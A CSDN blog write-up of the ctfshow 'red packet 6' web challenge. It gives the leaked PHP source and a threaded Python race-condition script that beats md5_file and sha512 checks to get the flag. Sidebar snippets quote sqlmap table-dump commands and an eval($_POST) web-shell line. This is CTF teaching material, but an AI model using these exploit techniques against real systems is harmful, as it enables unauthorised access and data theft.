ctfshow-红包题第六弹

已于 2023-03-18 15:11:26 修改
阅读量837 收藏 2
点赞数 4
分类专栏: CTF 文章标签: php
于 2023-03-13 22:18:02 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xyh_233/article/details/129508908
版权
红包题第六弹

对网上搜寻的题解进行一些勘误

实际上有fastcoll生成的相同的MD5值的文件仍然绕不过第一层的md5_file,因为新生成的两个文件的md5值才相同,而与源文件不同,通过并发编程实现先后两层的绕过

信息收集

首先有hint提示,不是SQL注入,可以发现源码,于是使用dirmap扫描出来有网站备份文件,解压后,代码如下:

function receiveStreamFile($receiveFile){
 
    $streamData = isset($GLOBALS['HTTP_RAW_POST_DATA'])? $GLOBALS['HTTP_RAW_POST_DATA'] : '';
 
    if(empty($streamData)){
        $streamData = file_get_contents('php://input');
    }
    if($streamData!=''){
        $ret = file_put_contents($receiveFile, $streamData, true);
    }else{
        $ret = false;
    }
    return $ret;
}
if(md5(date("i")) === $token){
	
	$receiveFile = 'flag.dat';
	receiveStreamFile($receiveFile);
	if(md5_file($receiveFile)===md5_file("key.dat")){
		if(hash_file("sha512",$receiveFile)!=hash_file("sha512","key.dat")){
			$ret['success']="1";
			$ret['msg']="人脸识别成功!$flag";
			$ret['error']="0";
			echo json_encode($ret);
			return;
		}

			$ret['errormsg']="same file";
			echo json_encode($ret);
			return;
	}
			$ret['errormsg']="md5 error";
			echo json_encode($ret);
			return;
} 

$ret['errormsg']="token error";
echo json_encode($ret);
return;
阅读源码

首先有一个对token的判断,于是我们抓包看看,

在这里插入图片描述

发现确实有一个token,是对当前日期做了一个MD5的编码,可以用python实现,然后设置了一个receivefile为flag.dat,然后调用receiveStreamFile($receiveFile);,可以发现是需要用php://input获取文件流,然后返回一个文件,接下来需要自己传上去的文件与已存在的key.dat的MD5要一致,sha512不一致,即可打印出flag

解题

那么我们的思路是,首先获得key.dat,首先访问一下这个文件,emmm,果然直接下载了,那么第一层的绕过我们直接就使用了key.dat文件,第二层的sha1值我们随便上传一个字符串即可,所以我们需要并发编程,将$receiveFile中的内容在极短时间内进行替换,这里我们可以编写一个python脚本来进行解题。

payload:

import requests
import time
import hashlib
import threading

#这里为什么用分钟数生成:因为通过抓包发现改变分钟后token值才会变化
i=str(time.localtime().tm_min)
#生成token
m=hashlib.md5(i.encode()).hexdigest()
url="http://063e4649-b8da-4090-8a6b-da6b11fa5f07.challenge.ctf.show/check.php?token={}&php://input".format(m)

def POST(data):
    try:
        r=requests.post(url,data=data)
        if "ctfshow" in r.text:
            print(r.text)
            pass
        # print(r.text)
        pass
    except Exception as e:
        print("somthing went wrong!")
        pass
    pass

with open('key.dat','rb') as t:
    data1=t.read()
    pass
for i in range(50):
    threading.Thread(target=POST,args=(data1,)).start()
for i in range(50):
    data2='emmmmm'
    threading.Thread(target=POST,args=(data2,)).start()

得出:

{"success":"1","msg":"\u4eba\u8138\u8bc6\u522b\u6210\u529f!ctfshow{6f98bbcc-82e2-4c3e-a46e-0a8f8ad403cd}","error":"0","errormsg":""}
fgdskfjadsklfjl
关注
  • 4
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
ctfshow-红包第五
m0_67507776的博客
04-19 802
1.下载压缩包,正常解压得到“《画》.mp3”,各种针对音频没有作用,上当,结束...... 2.本zip里面隐藏了一个图片,需要用foremost分离出来 3.使用steghide得到隐写flag.txt文本文件,密码是猜的123456 steghide info .\xx.jpg #检测文件 steghide extract -sf .\xx.jpg #分离文件 4.得到flag.txt aHR0cHM6Ly93d3cubGFuem91cy...
ctfshow-VIP目-Web-详细解思路
01-27
协议头信息泄露:根据目提示,使用浏览器自带的开发者工具查看响应头,看到flag,flag:ctfshow{967b5eb6-da34-49e5-85cd-0cec4bb26922}。 robots后台泄露:根据目提示,访问robots.txt,看到flag文件的路径,...
CTFshow-web-红包第六
qq_68581192的博客
11-03 164
首先获得key.dat,首先访问一下这个文件,emmm,果然直接下载了,那么第一层的绕过我们直接就使用了key.dat文件,第二层的sha1值我们随便上传一个字符串即可,所以我们需要并发编程,将$receiveFile中的内容在极短时间内进行替换,这里我们可以编写一个python脚本来进行解。发现web.zip目录是直接下载的,另外两个会跳转页面,但是内容是显示什么什么然后error。发现是跟key.dat比较,我们尝试在url中添加/key.dat,发现可以下载,我们利用下列代码。
ctfshow红包第六 wp
最新发布
jwkaaaaaa的博客
07-11 154
ctfshow红包第六 wp
CTFshow--web--红包第六
weixin_45908624的博客
01-29 908
ctfshow--web--红包第六
ctfshow红包第六
weixin_43873408的博客
08-02 1679
在开始界面点击hint得到提示信息: 打开连接得到的是一个登录界面,前面提示了不是sql注入,直接放弃尝试,查看网页源码得到信息: <script> function login(s){ var u=document.getElementById("username").value; var p=document.getElementById("password").value; var xhr = new XMLHttpRequest();
[ctf.show.reverse] 红包
weixin_52640415的博客
04-15 1024
下来是个压缩包,解开后一个原码,解码后是notflag,发现压缩包有5k大而解出的java文件只有1k,显然包里还有内容未解出 用010打开包发现有两个EzJar.class文件,手工切出解压 import zlib inflator = zlib.decompressobj(-zlib.MAX_WBITS) f=open('EzJar.jar','rb') f.seek(659) a=f.read(3248) f.close() x = inflator.decompress(a) f=open('
ctfshow-web-红包第六
HAI_WD的博客
08-26 1193
原理就是将上传的文件保存为flag.dat,然后进行对比,那么这种情况肯定会出现条件竞争,也就是说flag.dat在比较完第一次之后被覆盖了的话,就可以满足第二个条件。进行md5,然后就是文件md5对比,要求md5一致,但是sha512不一样,这里比较的文件是key.dat。首先跑一下字典,这里用的dirmap,可以看到有一个web.zip。下载下来之后发现是一个网站备份,备份的是check.php.bak。然后接着看,可以看到这里不太可能是sql注入,有一个请求。直接访问进行下载即可。
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
6. **条件判断**:掌握`if`、`else`、`switch`等条件语句,以根据变量值进行逻辑判断。 7. **错误和异常处理**:了解如何调试代码,发现因变量循环取值引发的错误或异常。 8. **函数和方法**:理解自定义函数的...
ctfshow-web41~60-WP
02-21
本篇文章主要关注的是CTFShow中的Web挑战第41至60的解思路与技术细节,尤其是目41中的命令注入攻击。 #### 目背景与目标 在目41中,参与者需要分析给定的PHP代码片段,理解其逻辑并找到漏洞所在。目标是...
CTFShow-周末大挑战parse-url篇Writeup
05-19
第六关,通过在URL中插入JavaScript代码 `<script language="php">eval($_POST[A]);</script>`,试图执行POST请求中的PHP代码。这意味着服务器可能同时解析PHP和JavaScript,存在跨语言代码注入的风险。 这些关卡...
ctfshow web189 无单引号,利用回显不同,盲注
10-21
ctfshow web189 无单引号,利用回显不同,盲注
ctf.show_红包第六
m0_74445847的博客
04-20 245
3.在极短的时间内,传上不同的key2.dat,通过SHA-512哈希值的比较。2.先上传一模一样的key.dat,通过md5值的比较。这里放了竞争的两种格式。
红包六(CTFshow)
m0_72827793的博客
01-25 971
我对应着看,结果发现都是0000,奇怪了,这怎么找?可以直接丢进去看,也可以用jd反汇编工具看。这里提示flag不在这里分析一下这段代码。3248怎么来的没搞懂,做个记录吧。就这样用jd反汇编打开这个java。但确实学习了一波压缩包的文件结构。压缩文件有5k解压却变成了1k。为什么是从第659个字节开始?jd逆向工具反编译jar文件。这得对压缩包的文件结构熟悉。jar的逆向,第一次接触。看了别人写的脚本文件。
ctfshow-web红包第六
2202_75812594的博客
04-22 224
3、由于先对文件进行操作,在进行之后的判断,我们可以利用md5中间判断的极小间隙替换原来flag.dat的数据,让sha512成立,造成条件竞争。通过dirmap或者dirsearch进行目录扫描,发现了一个web.zip的文件,下载即能获取check.php的源代码。通过php://input。由于条件竞争的是利用时间间隙来进行绕过,运气不好可能需要运行多次才能看到flag。1、date获取当前时间的分钟数,然后和我们传入的Token进行一个对比。函数里有一条向服务器发送请求的代码。
ctfshow萌新红包writeup
qq_45628145的博客
02-20 4612
ctfshow萌新专属红包writeup 目来源:https://ctf.show/ 这一是ctfshow平台上面2月17日更新的一个萌新红包,当天在官方交流群内知道晚上会有一个萌新红包之后,就有点期待了(小萌新也想拿一次红包,嘿嘿),下面来看看这个目吧。 进入目之后,是一个ctfshow萌新登录页面。 首先,老规矩,先看源码。一顿操作之后,没有任何发现。群主在官方交流群里面先后...
ctfshow 红包
qq_62046696的博客
08-28 781
其实这几道都是通过php的扩展来做,还是需要多翻php文档。
吾爱2023新年红包第六 (CTF)
热门推荐
Codeooo 博客
02-07 7万+
而且这里面还判断了key的长度,16位,正常key长度也是16位;上面这个 aWfkuqokj454836 15位,心态崩了,看来是假的,这个里面才是真的啊~~~~~~这几道,完全就是整人玩,一个一直点999次,一个大喊大叫还说你是细狗,还得声音分贝大于100才解锁开始找flag;直接将这个 |wfkuqokj4548366 key 扔进去 get_RealKey方法,在比较的时候打断点,或者hook,拿到正确的可以;看伪C代码,memcmp比较, 是有个和真key比较的地方,返回bool;
ctfshow sql
08-03
回答: 要在ctfshow数据库中执行SQL查询和获取数据,可以使用sqlmap工具。首先,使用以下命令查询ctfshow_user表的列名:python ./sqlmap.py -u "http://ef1aabd2-a275-40df-8ad4-99e7563322f8.challenge.ctf.show/api/?id=" --user-agent=sqlmap --referer=ctf.show -D ctfshow_web -T ctfshow_user --columns。[1]接下来,使用以下命令来查询和获取ctfshow_user表中的数据:python ./sqlmap.py -u "http://ef1aabd2-a275-40df-8ad4-99e7563322f8.challenge.ctf.show/api/?id=" --user-agent=sqlmap --referer=ctf.show -D ctfshow_web -T ctfshow_user --dump。[2]如果你只想直接获取最后一步的数据,可以使用以下命令:python sqlmap.py -u "http://b794446b-7f11-4600-beba-3de5961369b7.challenge.ctf.show/api/" --data="id=1" --user-agent=sqlmap --referer=ctf.show -D ctfshow_web -T ctfshow_user --dump。[3]这些命令将帮助你在ctfshow数据库中执行SQL查询和获取数据。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值